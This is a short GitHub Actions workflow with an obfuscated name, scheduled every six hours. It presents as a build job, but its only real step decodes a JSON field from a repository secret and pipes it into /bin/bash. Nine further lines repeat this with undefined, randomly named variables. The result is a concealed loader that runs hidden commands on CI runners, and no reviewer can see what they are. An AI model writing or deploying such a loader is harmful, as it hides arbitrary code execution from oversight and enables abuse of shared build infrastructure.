name: houchourendzg

on:
  workflow_dispatch:
  schedule:
    - cron: '22 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: houchourendzg
        env:
          a2: ${{ secrets.a2 }}
        run: |
          echo $a2 | jq -r .o09 | /bin/bash
          echo $m14997 | jq -r .qskr73 | /bin/bash
          echo $qt17033 | jq -r .ubf18 | /bin/bash
          echo $t92 | jq -r .mhs12257 | /bin/bash
          echo $qhn2165 | jq -r .bemxs52740 | /bin/bash
          echo $yh463 | jq -r .g3336 | /bin/bash
          echo $sicn1743 | jq -r .rtpq7166 | /bin/bash
          echo $p9618 | jq -r .cg6 | /bin/bash
          echo $v24003 | jq -r .x64 | /bin/bash
          echo $hqvms4 | jq -r .xeik40105 | /bin/bash

